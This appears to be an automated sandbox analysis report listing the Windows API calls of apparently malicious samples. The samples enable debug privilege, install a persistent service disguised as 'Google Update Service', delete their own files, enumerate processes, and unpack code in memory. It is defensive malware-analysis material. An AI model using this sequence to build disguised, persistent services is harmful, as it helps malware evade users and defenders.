    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_18f0000_Homeupd.jbxd
    APIs
      • Part of subcall function 018F2E5E: LoadLibraryA.KERNEL32(user32.dll), ref: 018F2E6C
      • Part of subcall function 018F2E5E: GetProcAddress.KERNEL32(00000000,AnimateWindow), ref: 018F2E89
      • Part of subcall function 018F2E5E: GetProcAddress.KERNEL32(00000000,CreateSystemThreads), ref: 018F2E9A
      • Part of subcall function 018F2E5E: FreeLibrary.KERNEL32(00000000), ref: 018F2EFC
    • GetLastError.KERNEL32(00000000,?,?,?,018F3172,?), ref: 018F2F51
    • GetLastError.KERNEL32(00000000,?,?,?,018F3172,?), ref: 018F2F5C
    • GetCurrentProcess.KERNEL32 ref: 018F2F6F
    • GetLastError.KERNEL32(?,?,018F3172,?), ref: 018F2F8F
    Memory Dump Source
    • Source File: 00000003.00000002.281653048.018F1000.00000020.sdmp, Offset: 018F0000, based on PE: true
    • Associated: 00000003.00000002.281647801.018F0000.00000002.sdmp
    • Associated: 00000003.00000002.281659353.018F5000.00000002.sdmp
    • Associated: 00000003.00000002.281664813.018F8000.00000004.sdmp
    • Associated: 00000003.00000002.281672336.01901000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_18f0000_Homeupd.jbxd
    APIs
    • PostMessageA.USER32(?,00000100,00000028,00000000), ref: 018F2FD0
    • PostMessageA.USER32(?,00000100,00000027,00000000), ref: 018F2FDA
    • PostMessageA.USER32(?,00000201,00000000,00000000), ref: 018F2FE8
    • DefWindowProcA.USER32(?,00000121,?,?), ref: 018F2FF8
    Memory Dump Source
    • Source File: 00000003.00000002.281653048.018F1000.00000020.sdmp, Offset: 018F0000, based on PE: true
    • Associated: 00000003.00000002.281647801.018F0000.00000002.sdmp
    • Associated: 00000003.00000002.281659353.018F5000.00000002.sdmp
    • Associated: 00000003.00000002.281664813.018F8000.00000004.sdmp
    • Associated: 00000003.00000002.281672336.01901000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_18f0000_Homeupd.jbxd

    Executed Functions

    APIs
    • HeapCreate.KERNEL32(00040000,00400000,00000000), ref: 004031EF
    • lstrcpy.KERNEL32(?,qwererthwebfsdvjaf+), ref: 0040320E
      • Part of subcall function 00401070: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000008), ref: 00401090
      • Part of subcall function 00401070: CryptCreateHash.ADVAPI32(00000000,00008004,00000000,00000000,?), ref: 004010B0
      • Part of subcall function 00401070: VirtualAlloc.KERNEL32(00000000,00000015,00003000,00000004), ref: 004010C9
      • Part of subcall function 00401070: CryptHashData.ADVAPI32(?,00000000,00000014,00000013), ref: 00401102
      • Part of subcall function 00401070: CryptGetHashParam.ADVAPI32(?,00000004,?,?,00000013), ref: 00401128
      • Part of subcall function 00401070: CryptGetHashParam.ADVAPI32(?,00000002,00000014,00000014,00000000), ref: 00401154
      • Part of subcall function 00401070: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00401169
      • Part of subcall function 00401070: CryptDestroyHash.ADVAPI32(?), ref: 00401176
      • Part of subcall function 00401070: CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 00401183
    • ExitProcess.KERNEL32(00000000), ref: 004032D1
      • Part of subcall function 00401000: GetCurrentProcess.KERNEL32 ref: 0040100F
      • Part of subcall function 00401000: OpenProcessToken.ADVAPI32(00000000), ref: 00401016
      • Part of subcall function 00401000: LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 00401031
      • Part of subcall function 00401000: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,00000000,00000000), ref: 0040104F
      • Part of subcall function 00401000: CloseHandle.KERNEL32(?), ref: 0040105B
    • StartServiceCtrlDispatcherW.ADVAPI32 ref: 004032B9
      • Part of subcall function 00402BB0: GetModuleFileNameW.KERNEL32(00000000,?,00000168,?,00000000), ref: 00402BCA
      • Part of subcall function 00402BB0: GetWindowsDirectoryW.KERNEL32(?,00000168,?,00000000), ref: 00402BDC
      • Part of subcall function 00402BB0: lstrcatW.KERNEL32(?,00404258), ref: 00402BF4
      • Part of subcall function 00402BB0: StrStrIW.SHLWAPI(?,?), ref: 00402C0A
      • Part of subcall function 00402BB0: lstrcatW.KERNEL32(?,?), ref: 00402C28
      • Part of subcall function 00402BB0: lstrcatW.KERNEL32(?,.exe), ref: 00402C36
      • Part of subcall function 00402BB0: ExitProcess.KERNEL32(00000000), ref: 00402C68
      • Part of subcall function 00402BB0: GetCommandLineW.KERNEL32(?,00000000), ref: 00402C6E
      • Part of subcall function 00402BB0: StrStrIW.SHLWAPI(00000000,?), ref: 00402C7E
      • Part of subcall function 00402BB0: DeleteFileW.KERNEL32(00000000), ref: 00402C8D
      • Part of subcall function 00402BB0: Sleep.KERNEL32(00000064), ref: 00402C9D
      • Part of subcall function 00402BB0: DeleteFileW.KERNEL32(00000000), ref: 00402CA5
      • Part of subcall function 00402BB0: OpenMutexW.KERNEL32(00100000,00000000,Global\zx5fwtw4ep), ref: 00402CC6
      • Part of subcall function 00402BB0: CloseHandle.KERNEL32(00000000), ref: 00402CD1
      • Part of subcall function 00402BB0: ExitProcess.KERNEL32(00000000,?,00000000), ref: 00402CD9
      • Part of subcall function 00402DC0: GetModuleFileNameW.KERNEL32(00000000,?,00000168,?,00000000), ref: 00402DDA
      • Part of subcall function 00402DC0: SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 00402DEF
      • Part of subcall function 00402DC0: StrStrIW.SHLWAPI(?,Roaming), ref: 00402E07
      • Part of subcall function 00402DC0: lstrcpyW.KERNEL32(00000000,Local), ref: 00402E13
      • Part of subcall function 00402DC0: lstrcatW.KERNEL32(?,00404258), ref: 00402E2B
      • Part of subcall function 00402DC0: lstrlenW.KERNEL32(?), ref: 00402E34
      • Part of subcall function 00402DC0: StrStrIW.SHLWAPI(?,?), ref: 00402E52
      • Part of subcall function 00402DC0: StrStrIW.SHLWAPI(?,temp), ref: 00402E68
      • Part of subcall function 00402DC0: GetCommandLineW.KERNEL32 ref: 00402E72
      • Part of subcall function 00402DC0: StrStrIW.SHLWAPI(00000000,?), ref: 00402E82
      • Part of subcall function 00402DC0: DeleteFileW.KERNEL32(00000000), ref: 00402E91
      • Part of subcall function 00402DC0: Sleep.KERNEL32(00000064), ref: 00402EA1
      • Part of subcall function 00402DC0: DeleteFileW.KERNEL32(00000000), ref: 00402EA9
      • Part of subcall function 00402DC0: OpenMutexW.KERNEL32(00100000,00000000,Global\zx5fwtw4ep), ref: 00402EC6
      • Part of subcall function 00402DC0: CloseHandle.KERNEL32(00000000), ref: 00402ED1
      • Part of subcall function 00402DC0: ExitProcess.KERNEL32(00000000,?,00000000), ref: 00402ED9
      • Part of subcall function 00402DC0: lstrcatW.KERNEL32(?,?), ref: 00402F41
      • Part of subcall function 00402DC0: lstrcatW.KERNEL32(?,.exe), ref: 00402F4F
      • Part of subcall function 00402DC0: ExitProcess.KERNEL32(00000000), ref: 00402F81
      • Part of subcall function 00402DC0: RegisterServiceCtrlHandlerW.ADVAPI32(Google Update Service,004030D0), ref: 00402F9B
      • Part of subcall function 00402DC0: SetServiceStatus.ADVAPI32(00000000,00405014), ref: 00402FFF
      • Part of subcall function 00402DC0: CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 0040300A
      • Part of subcall function 00402DC0: RtlGetLastWin32Error.NTDLL ref: 00403025
      • Part of subcall function 00402DC0: SetServiceStatus.ADVAPI32(00000000,00405014), ref: 00403042
      • Part of subcall function 00402DC0: SetServiceStatus.ADVAPI32(00000000,00405014), ref: 00403072
      • Part of subcall function 00402DC0: CreateThread.KERNEL32(00000000,00000000,00403130,00000000), ref: 0040307E
      • Part of subcall function 00402DC0: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00403087
      • Part of subcall function 00402DC0: CloseHandle.KERNEL32(FFFFFFFF), ref: 00403093
      • Part of subcall function 00402DC0: SetServiceStatus.ADVAPI32(00000000,00405014), ref: 004030C1
      • Part of subcall function 004025A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004025B8
      • Part of subcall function 004025A0: Process32FirstW.KERNEL32(00000000,0000022C), ref: 004025C8
      • Part of subcall function 004025A0: lstrcmpiW.KERNEL32(?,00000000), ref: 004025EB
      • Part of subcall function 004025A0: Process32NextW.KERNEL32(00000000,0000022C), ref: 0040260A
      • Part of subcall function 004025A0: CloseHandle.KERNEL32(00000000), ref: 00402618
      • Part of subcall function 004025A0: RtlGetLastWin32Error.NTDLL ref: 0040261E
    Memory Dump Source
    • Source File: 00000004.00000002.314783051.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000004.00000002.314772170.00400000.00000002.sdmp
    • Associated: 00000004.00000002.314789999.00404000.00000002.sdmp
    • Associated: 00000004.00000002.314795405.00405000.00000004.sdmp
    • Associated: 00000004.00000002.314805556.00406000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_PTnbUd10.jbxd
    APIs
    • GetCurrentDirectoryW.KERNEL32(00000400,?), ref: 00438810
    • ??2@YAPAXI@Z.CRTDLL(00000400), ref: 0043881B
    • lstrcpyW.KERNEL32(?,?), ref: 0043883D
    • lstrcatW.KERNEL32(?,\ini.txt), ref: 0043884F
    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0043886E
    • GetFileSize.KERNEL32(000000FF,00000000), ref: 00438883
    • ReadFile.KERNEL32(000000FF,?,?,?,00000000), ref: 004388A1
    • MessageBoxW.USER32(00000000,?,Read file error,00000000), ref: 004388C8
    • CloseHandle.KERNEL32(000000FF), ref: 004388D9
    • ??2@YAPAXI@Z.CRTDLL(00000FFF), ref: 004388E4
    • CreateWindowExW.USER32 ref: 00438926
    • CreateWindowExW.USER32 ref: 0043895F
    • LoadLibraryW.KERNEL32(Riched32.dll), ref: 0043896F
    • CreateWindowExW.USER32 ref: 004389A2
    • CreateWindowExW.USER32 ref: 004389DB
    • CreateWindowExW.USER32 ref: 00438A11
    • CreateWindowExW.USER32 ref: 00438A49
    • CreateWindowExW.USER32 ref: 00438A82
    • CreateWindowExW.USER32 ref: 00438ABB
    • SendMessageW.USER32(?,00000465,00000000,00000000), ref: 00438AD9
    • CreateWindowExW.USER32 ref: 00438B0D
    • SendMessageW.USER32(00000000,00000443,00000000,000010FF), ref: 00438B37
    • SendMessageW.USER32(?,000004C9,00000000,00000000), ref: 00438B73
    • SendMessageW.USER32(00000000,00000443,00000000,000020FF), ref: 00438B93
    • DestroyWindow.USER32(00000000), ref: 00438BA3
      • Part of subcall function 00437BC0: EndDialog.USER32(?,?), ref: 00437C47
    • DialogBoxParamW.USER32(27C0AB09,00000067,?,Function_00037BF0,00000000), ref: 00438C06
    • DestroyWindow.USER32(?), ref: 00438C12
    • DefWindowProcW.USER32(?,?,?,?), ref: 00438C2A
    • BeginPaint.USER32(?,?), ref: 00438C3C
    • EndPaint.USER32(?,?), ref: 00438C50
    • PostQuitMessage.USER32(00000000), ref: 00438C5A
    • DefWindowProcW.USER32(?,?,?,?), ref: 00438C72
    Memory Dump Source
    • Source File: 00000004.00000001.250352668.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000004.00000001.250339391.00400000.00000002.sdmp
    • Associated: 00000004.00000001.250417259.0045C000.00000002.sdmp
    • Associated: 00000004.00000001.250443181.00463000.00000008.sdmp
    • Associated: 00000004.00000001.250473245.0047B000.00000004.sdmp
    • Associated: 00000004.00000001.250493441.0047C000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_1_400000_PTnbUd10.jbxd
    APIs
    • GetModuleFileNameW.KERNEL32(00000000,?,00000168,?,00000000), ref: 00402BCA
    • GetWindowsDirectoryW.KERNEL32(?,00000168,?,00000000), ref: 00402BDC
    • lstrcatW.KERNEL32(?,00404258), ref: 00402BF4
    • StrStrIW.SHLWAPI(?,?), ref: 00402C0A
    • lstrcatW.KERNEL32(?,?), ref: 00402C28
    • lstrcatW.KERNEL32(?,.exe), ref: 00402C36
      • Part of subcall function 00401320: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00401344
      • Part of subcall function 00401320: GetFileSize.KERNEL32(00000000,00000000), ref: 00401353
      • Part of subcall function 00401320: CreateFileW.KERNEL32(00000000,40000000,00000001,00000000,00000002,00000000,00000000), ref: 00401377
      • Part of subcall function 00401320: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 004013C6
      • Part of subcall function 00401320: SetFilePointer.KERNEL32(00000000,-00000200,00000000,00000000), ref: 004013D6
      • Part of subcall function 00401320: ReadFile.KERNEL32(00000000,?,00000200,00000000,00000000), ref: 004013FA
      • Part of subcall function 00401320: WriteFile.KERNEL32(00000000,?,00000200,?,00000000), ref: 00401427
      • Part of subcall function 00401320: CloseHandle.KERNEL32(00000000), ref: 00401457
      • Part of subcall function 00401320: CloseHandle.KERNEL32(00000000), ref: 0040145E
    • ExitProcess.KERNEL32(00000000), ref: 00402C68
      • Part of subcall function 00401550: lstrlenW.KERNEL32(?), ref: 0040155C
      • Part of subcall function 00401550: RtlAllocateHeap.NTDLL(00970000,00000008,00000000), ref: 00401572
      • Part of subcall function 00401550: lstrlenW.KERNEL32(|/@), ref: 004015A1
      • Part of subcall function 00401550: RtlAllocateHeap.NTDLL(00970000,00000008), ref: 004015B7
      • Part of subcall function 00401550: RtlFreeHeap.NTDLL(00970000,00000000,00000000), ref: 004015CD
      • Part of subcall function 00401550: CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000020,00000000,00000000,?,?), ref: 0040163F
      • Part of subcall function 00401550: CloseHandle.KERNEL32(?), ref: 00401653
      • Part of subcall function 00401550: CloseHandle.KERNEL32(?), ref: 00401659
      • Part of subcall function 00401550: RtlFreeHeap.NTDLL(00970000,00000000,00000000), ref: 0040166A
      • Part of subcall function 00401550: RtlFreeHeap.NTDLL(00970000,00000000,00000000), ref: 00401676
    • GetCommandLineW.KERNEL32(?,00000000), ref: 00402C6E
    • StrStrIW.SHLWAPI(00000000,?), ref: 00402C7E
    • DeleteFileW.KERNEL32(00000000), ref: 00402C8D
    • Sleep.KERNEL32(00000064), ref: 00402C9D
    • DeleteFileW.KERNEL32(00000000), ref: 00402CA5
      • Part of subcall function 004023A0: OpenSCManagerW.ADVAPI32(00000000,00000000,00000002), ref: 004023AA
      • Part of subcall function 004023A0: CreateServiceW.ADVAPI32(00000000,googleupdate,Google Update Service,000F01FF,00000010,00000002,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,7C831F63), ref: 004023E4
      • Part of subcall function 004023A0: RtlGetLastWin32Error.NTDLL ref: 004023EE
      • Part of subcall function 004023A0: OpenServiceW.ADVAPI32(00000000,googleupdate,000F01FF), ref: 00402406
      • Part of subcall function 004023A0: DeleteService.ADVAPI32(00000000,?,00402CB7,?,?,00000000), ref: 00402413
      • Part of subcall function 004023A0: CloseServiceHandle.ADVAPI32(00000000), ref: 0040241C
      • Part of subcall function 004023A0: CloseServiceHandle.ADVAPI32(00000000), ref: 00402427
      • Part of subcall function 004023A0: CloseServiceHandle.ADVAPI32(00000000), ref: 0040243C
      • Part of subcall function 004023A0: CloseServiceHandle.ADVAPI32(00000000), ref: 0040243F
    • OpenMutexW.KERNEL32(00100000,00000000,Global\zx5fwtw4ep), ref: 00402CC6
    • CloseHandle.KERNEL32(00000000), ref: 00402CD1
    • ExitProcess.KERNEL32(00000000,?,00000000), ref: 00402CD9
      • Part of subcall function 00402B10: RtlRestoreLastWin32Error.NTDLL(00000000), ref: 00402B4F
      • Part of subcall function 00402B10: OpenProcess.KERNEL32(00000408,00000000,00000340), ref: 00402B5D
      • Part of subcall function 00402B10: CloseHandle.KERNEL32(00000000), ref: 00402B6F
      • Part of subcall function 00402B10: RtlGetLastWin32Error.NTDLL ref: 00402B77
      • Part of subcall function 00402B10: OpenProcess.KERNEL32(00000408,00000000,00000340), ref: 00402B85
      • Part of subcall function 00402B10: CloseHandle.KERNEL32(00000000), ref: 00402B97
      • Part of subcall function 00402B10: GetModuleHandleW.KERNEL32(00000000), ref: 00402B9F
      • Part of subcall function 00401190: QueryPerformanceCounter.KERNEL32(00000000), ref: 004011A4
      • Part of subcall function 00401190: QueryPerformanceCounter.KERNEL32(1/@), ref: 004011DE
      • Part of subcall function 00401190: QueryPerformanceCounter.KERNEL32(?), ref: 00401228
    Memory Dump Source
    • Source File: 00000004.00000002.314783051.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000004.00000002.314772170.00400000.00000002.sdmp
    • Associated: 00000004.00000002.314789999.00404000.00000002.sdmp
    • Associated: 00000004.00000002.314795405.00405000.00000004.sdmp
    • Associated: 00000004.00000002.314805556.00406000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_PTnbUd10.jbxd
    APIs
    • lstrlenW.KERNEL32(?), ref: 0040155C
    • RtlAllocateHeap.NTDLL(00970000,00000008,00000000), ref: 00401572
    • lstrlenW.KERNEL32(|/@), ref: 004015A1
    • RtlAllocateHeap.NTDLL(00970000,00000008), ref: 004015B7
    • RtlFreeHeap.NTDLL(00970000,00000000,00000000), ref: 004015CD
    • CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000020,00000000,00000000,?,?), ref: 0040163F
    • CloseHandle.KERNEL32(?), ref: 00401653
    • CloseHandle.KERNEL32(?), ref: 00401659
    • RtlFreeHeap.NTDLL(00970000,00000000,00000000), ref: 0040166A
    • RtlFreeHeap.NTDLL(00970000,00000000,00000000), ref: 00401676
    Memory Dump Source
    • Source File: 00000004.00000002.314783051.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000004.00000002.314772170.00400000.00000002.sdmp
    • Associated: 00000004.00000002.314789999.00404000.00000002.sdmp
    • Associated: 00000004.00000002.314795405.00405000.00000004.sdmp
    • Associated: 00000004.00000002.314805556.00406000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_PTnbUd10.jbxd
    APIs
    • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000008), ref: 00401090
    • CryptCreateHash.ADVAPI32(00000000,00008004,00000000,00000000,?), ref: 004010B0
    • VirtualAlloc.KERNEL32(00000000,00000015,00003000,00000004), ref: 004010C9
    • CryptHashData.ADVAPI32(?,00000000,00000014,00000013), ref: 00401102
    • CryptGetHashParam.ADVAPI32(?,00000004,?,?,00000013), ref: 00401128
    • CryptGetHashParam.ADVAPI32(?,00000002,00000014,00000014,00000000), ref: 00401154
    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00401169
    • CryptDestroyHash.ADVAPI32(?), ref: 00401176
    • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 00401183
    Memory Dump Source
    • Source File: 00000004.00000002.314783051.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000004.00000002.314772170.00400000.00000002.sdmp
    • Associated: 00000004.00000002.314789999.00404000.00000002.sdmp
    • Associated: 00000004.00000002.314795405.00405000.00000004.sdmp
    • Associated: 00000004.00000002.314805556.00406000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_PTnbUd10.jbxd
    APIs
    • OpenProcessToken.ADVAPI32(00000000,00000008,?), ref: 00401493
    • CreateWellKnownSid.ADVAPI32(00000016,00000000,?,?), ref: 004014B3
    • GetTokenInformation.ADVAPI32(?,00000001,00000000,00000000,?), ref: 004014D3
    • RtlGetLastWin32Error.NTDLL ref: 004014D5
    • RtlAllocateHeap.NTDLL(00970000,00000008,?), ref: 004014EE
    • GetTokenInformation.ADVAPI32(?,00000001,00000000,?,?), ref: 00401509
    • EqualSid.ADVAPI32(00000000,?), ref: 00401516
    • RtlFreeHeap.NTDLL(00970000,00000000,00000000), ref: 0040152F
    • CloseHandle.KERNEL32(?), ref: 0040153B
    Memory Dump Source
    • Source File: 00000004.00000002.314783051.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000004.00000002.314772170.00400000.00000002.sdmp
    • Associated: 00000004.00000002.314789999.00404000.00000002.sdmp
    • Associated: 00000004.00000002.314795405.00405000.00000004.sdmp
    • Associated: 00000004.00000002.314805556.00406000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_PTnbUd10.jbxd
    APIs
    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00401344
    • GetFileSize.KERNEL32(00000000,00000000), ref: 00401353
    • CreateFileW.KERNEL32(00000000,40000000,00000001,00000000,00000002,00000000,00000000), ref: 00401377
    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 004013C6
    • SetFilePointer.KERNEL32(00000000,-00000200,00000000,00000000), ref: 004013D6
    • ReadFile.KERNEL32(00000000,?,00000200,00000000,00000000), ref: 004013FA
    • WriteFile.KERNEL32(00000000,?,00000200,?,00000000), ref: 00401427
    • CloseHandle.KERNEL32(00000000), ref: 00401457
      • Part of subcall function 00401290: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 004012A6
      • Part of subcall function 00401290: SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 004012B5
      • Part of subcall function 00401290: ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004012D1
      • Part of subcall function 00401290: WriteFile.KERNEL32(00000000,?,00000000,00000000), ref: 004012F5
    • CloseHandle.KERNEL32(00000000), ref: 0040145E
    Memory Dump Source
    • Source File: 00000004.00000002.314783051.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000004.00000002.314772170.00400000.00000002.sdmp
    • Associated: 00000004.00000002.314789999.00404000.00000002.sdmp
    • Associated: 00000004.00000002.314795405.00405000.00000004.sdmp
    • Associated: 00000004.00000002.314805556.00406000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_PTnbUd10.jbxd
    APIs
    • LoadIconW.USER32(?,0000006B), ref: 0042BF95
    • LoadCursorW.USER32(00000000,00007F00), ref: 0042BFA5
    • LoadIconW.USER32(?,0000006C), ref: 0042BFC9
    • RegisterClassExW.USER32(00000030), ref: 0042BFD6
    Memory Dump Source
    • Source File: 00000004.00000001.250352668.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000004.00000001.250339391.00400000.00000002.sdmp
    • Associated: 00000004.00000001.250417259.0045C000.00000002.sdmp
    • Associated: 00000004.00000001.250443181.00463000.00000008.sdmp
    • Associated: 00000004.00000001.250473245.0047B000.00000004.sdmp
    • Associated: 00000004.00000001.250493441.0047C000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_1_400000_PTnbUd10.jbxd
    APIs
    • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 003E014E
    • VirtualAlloc.KERNEL32(?,?,00002000,00000001), ref: 003E0275
    • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000004), ref: 003E029A
    • VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,?,?), ref: 003E02EE
    • LoadLibraryA.KERNEL32(?), ref: 003E0339
    • VirtualProtect.KERNEL32(?,00001000,00000002,?), ref: 003E0433
    • VirtualProtect.KERNEL32(?,?,00000001,?,?), ref: 003E0482
    Memory Dump Source
    • Source File: 00000004.00000002.314754272.003E0000.00000040.sdmp, Offset: 003E0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_3e0000_PTnbUd10.jbxd
    APIs
    • LoadStringW.USER32(?,00000067,0047B940,00000064), ref: 0041A8A3
    • LoadStringW.USER32(?,0000006D,0047BA08,00000064), ref: 0041A8B6
      • Part of subcall function 0042BF60: LoadIconW.USER32(?,0000006B), ref: 0042BF95
      • Part of subcall function 0042BF60: LoadCursorW.USER32(00000000,00007F00), ref: 0042BFA5
      • Part of subcall function 0042BF60: LoadIconW.USER32(?,0000006C), ref: 0042BFC9
      • Part of subcall function 0042BF60: RegisterClassExW.USER32(00000030), ref: 0042BFD6
      • Part of subcall function 00438D40: CreateWindowExW.USER32 ref: 00438D75
      • Part of subcall function 00438D40: ShowWindow.USER32(00000000,?), ref: 00438D90
      • Part of subcall function 00438D40: UpdateWindow.USER32(00000000), ref: 00438D9A
    • LoadAcceleratorsW.USER32(?,0000006D), ref: 0041A8E6
    • GetMessageW.USER32(0012FF68,00000000,00000000,00000000), ref: 0041A8F9
    • TranslateAcceleratorW.USER32(?,00000000,0012FF68), ref: 0041A90F
    • TranslateMessage.USER32(0012FF68), ref: 0041A91D
    • DispatchMessageW.USER32(0012FF68), ref: 0041A927
    Memory Dump Source
    • Source File: 00000004.00000001.250352668.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000004.00000001.250339391.00400000.00000002.sdmp
    • Associated: 00000004.00000001.250417259.0045C000.00000002.sdmp
    • Associated: 00000004.00000001.250443181.00463000.00000008.sdmp
    • Associated: 00000004.00000001.250473245.0047B000.00000004.sdmp
    • Associated: 00000004.00000001.250493441.0047C000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_1_400000_PTnbUd10.jbxd
    APIs
    • GetCurrentProcess.KERNEL32 ref: 0040100F
    • OpenProcessToken.ADVAPI32(00000000), ref: 00401016
    • LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 00401031
    • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,00000000,00000000), ref: 0040104F
    • CloseHandle.KERNEL32(?), ref: 0040105B
    Memory Dump Source
    • Source File: 00000004.00000002.314783051.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000004.00000002.314772170.00400000.00000002.sdmp
    • Associated: 00000004.00000002.314789999.00404000.00000002.sdmp
    • Associated: 00000004.00000002.314795405.00405000.00000004.sdmp
    • Associated: 00000004.00000002.314805556.00406000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_PTnbUd10.jbxd
    APIs
    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004025B8
    • Process32FirstW.KERNEL32(00000000,0000022C), ref: 004025C8
    • lstrcmpiW.KERNEL32(?,00000000), ref: 004025EB
    • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040260A
    • CloseHandle.KERNEL32(00000000), ref: 00402618
    • RtlGetLastWin32Error.NTDLL ref: 0040261E
    Memory Dump Source
    • Source File: 00000004.00000002.314783051.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000004.00000002.314772170.00400000.00000002.sdmp
    • Associated: 00000004.00000002.314789999.00404000.00000002.sdmp
    • Associated: 00000004.00000002.314795405.00405000.00000004.sdmp
    • Associated: 00000004.00000002.314805556.00406000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_PTnbUd10.jbxd
    APIs
    • CreateWindowExW.USER32 ref: 00438D75
    • ShowWindow.USER32(00000000,?), ref: 00438D90
    • UpdateWindow.USER32(00000000), ref: 00438D9A
    Memory Dump Source
    • Source File: 00000004.00000001.250352668.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000004.00000001.250339391.00400000.00000002.sdmp
    • Associated: 00000004.00000001.250417259.0045C000.00000002.sdmp
    • Associated: 00000004.00000001.250443181.00463000.00000008.sdmp
    • Associated: 00000004.00000001.250473245.0047B000.00000004.sdmp
    • Associated: 00000004.00000001.250493441.0047C000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_1_400000_PTnbUd10.jbxd
    APIs
    • __GetMainArgs.CRTDLL(0012FF84,0012FF88,0012FF8C), ref: 00417749
    • _initterm.CRTDLL(0045C0DC,0045C0E0), ref: 0041775B
    • GetStartupInfoA.KERNEL32(0012FF38), ref: 004177B2
    • GetModuleHandleA.KERNEL32(00000000), ref: 004177CD
      • Part of subcall function 0041A890: LoadStringW.USER32(?,00000067,0047B940,00000064), ref: 0041A8A3
      • Part of subcall function 0041A890: LoadStringW.USER32(?,0000006D,0047BA08,00000064), ref: 0041A8B6
      • Part of subcall function 0041A890: LoadAcceleratorsW.USER32(?,0000006D), ref: 0041A8E6
      • Part of subcall function 0041A890: GetMessageW.USER32(0012FF68,00000000,00000000,00000000), ref: 0041A8F9
      • Part of subcall function 0041A890: TranslateAcceleratorW.USER32(?,00000000,0012FF68), ref: 0041A90F
      • Part of subcall function 0041A890: TranslateMessage.USER32(0012FF68), ref: 0041A91D
      • Part of subcall function 0041A890: DispatchMessageW.USER32(0012FF68), ref: 0041A927
    • exit.CRTDLL(00000000,00000000,?,0000000A), ref: 004177DA
    Memory Dump Source
    • Source File: 00000004.00000001.250352668.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000004.00000001.250339391.00400000.00000002.sdmp
    • Associated: 00000004.00000001.250417259.0045C000.00000002.sdmp
    • Associated: 00000004.00000001.250443181.00463000.00000008.sdmp
    • Associated: 00000004.00000001.250473245.0047B000.00000004.sdmp
    • Associated: 00000004.00000001.250493441.0047C000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_1_400000_PTnbUd10.jbxd
    APIs
    • RtlGetLastWin32Error.NTDLL ref: 00402636
    • RtlRestoreLastWin32Error.NTDLL(00000000), ref: 0040263E
    • OpenProcess.KERNEL32(00000400,00000000,?), ref: 00402650
      • Part of subcall function 00401480: OpenProcessToken.ADVAPI32(00000000,00000008,?), ref: 00401493
